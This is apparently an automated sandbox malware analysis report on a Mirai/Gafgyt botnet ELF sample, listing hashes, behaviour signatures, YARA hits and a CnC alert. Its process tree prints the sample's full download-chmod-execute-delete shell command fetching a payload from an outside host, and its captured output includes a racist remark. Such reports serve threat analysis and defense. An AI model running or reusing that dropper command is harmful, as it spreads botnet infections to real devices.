Edit tour

Linux Analysis Report
mipsel.elf

Overview

General Information

Sample name:	mipsel.elf
Analysis ID:	1686580
Has dependencies:	false
MD5:	42df0be80d2c8672b1f3f98383648b9b
SHA1:	a6aa14c2b6b56e854de2828853ff44ef511ca246
SHA256:	97bb2f637b0b13cc8a54e00a360eba90029d90b28dcdaeeab86b5df673293593
Tags:	elfuser-abuse_ch
Infos:

Detection

Gafgyt, Mirai

Score:	96
Range:	0 - 100

Signatures

Antivirus / Scanner detection for submitted sample

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Gafgyt

Yara detected Mirai

Contains symbols with names commonly found in malware

Opens /proc/net/* files useful for finding connected devices and routers

Creates hidden files and/or directories

Creates hidden files without content (potentially used as a mutex)

Detected TCP or UDP traffic on non-standard ports

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "rm" command used to delete files or directories

Executes the "wget" command typically used for HTTP/S downloading

Reads the 'hosts' file potentially containing internal network hosts

Sample contains strings that are user agent strings indicative of HTTP manipulation

Sample tries to set the executable flag

Sets full permissions to files and/or directories

Uses the "uname" system call to query kernel version information (possible evasion)

Yara signature match

Classification

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1686580
Start date and time:	2025-05-10 07:43:17 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mipsel.elf
Detection:	MAL
Classification:	mal96.spre.troj.linELF@0/0@6/0

Warnings

VT rate limit hit for: gay.energy

Runtime Messages

Command:	/tmp/mipsel.elf
PID:	5493
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	gosh that chinese family at the other table sure ate alot
Standard Error:

Process Tree

system is lnxubuntu20

mipsel.elf (PID: 5493, Parent: 5410, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mipsel.elf

mipsel.elf New Fork (PID: 5495, Parent: 5493)

sh (PID: 5495, Parent: 5493, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."

sh New Fork (PID: 5510, Parent: 5495)

wget (PID: 5510, Parent: 5495, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget -q http://gay.energy/.../vivid -O .....

sh New Fork (PID: 5511, Parent: 5495)

chmod (PID: 5511, Parent: 5495, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 .....

sh New Fork (PID: 5512, Parent: 5495)

sh (PID: 5512, Parent: 5495, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh ./.....

sh New Fork (PID: 5514, Parent: 5495)

rm (PID: 5514, Parent: 5495, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf .....

mipsel.elf New Fork (PID: 5497, Parent: 5493)

mipsel.elf New Fork (PID: 5499, Parent: 5493)

mipsel.elf New Fork (PID: 5501, Parent: 5499)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Bashlite, Gafgyt	Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.	No Attribution	http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ https://blog.cyber5w.com/gafgyt-backdoor-analysis https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
mipsel.elf	JoeSecurity_Gafgyt	Yara detected Gafgyt	Joe Security
mipsel.elf	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
mipsel.elf	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F

Memory Dumps

Source	Rule	Description	Author	Strings
5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5497.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5499.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
5493.1.00007f2e40400000.00007f2e40421000.r-x.sdmp	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x1c940:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c954:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c968:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c97c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c990:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9a4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9b8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9cc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9e0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1c9f4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca08:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca1c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca30:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca44:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca58:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca6c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca80:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1ca94:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1caa8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cabc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x1cad0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: mipsel.elf PID: 5493	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: mipsel.elf PID: 5493	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x5436:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x544a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x545e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5472:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5486:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x549a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54ae:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54c2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54d6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54ea:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x54fe:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5512:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5526:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x553a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x554e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5562:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x5576:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x558a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x559e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x55b2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x55c6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: mipsel.elf PID: 5497	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: mipsel.elf PID: 5497	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x4b62:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4b76:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4b8a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4b9e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4bb2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4bc6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4bda:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4bee:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c02:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c16:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c2a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c3e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c52:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c66:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c7a:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4c8e:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4ca2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4cb6:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4cca:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4cde:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x4cf2:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Process Memory Space: mipsel.elf PID: 5499	JoeSecurity_Mirai_8	Yara detected Mirai	Joe Security
Process Memory Space: mipsel.elf PID: 5499	Linux_Trojan_Gafgyt_28a2fe0c	unknown	unknown	0x2a93:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2aa7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2abb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2acf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2ae3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2af7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b0b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b1f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b33:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b47:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b5b:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b6f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b83:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2b97:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2bab:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2bbf:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2bd3:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2be7:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2bfb:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2c0f:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F 0x2c23:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
Click to see the 7 entries

Suricata Signatures

ETPRO MALWARE ELF/BASHLITE Variant CnC Server Response

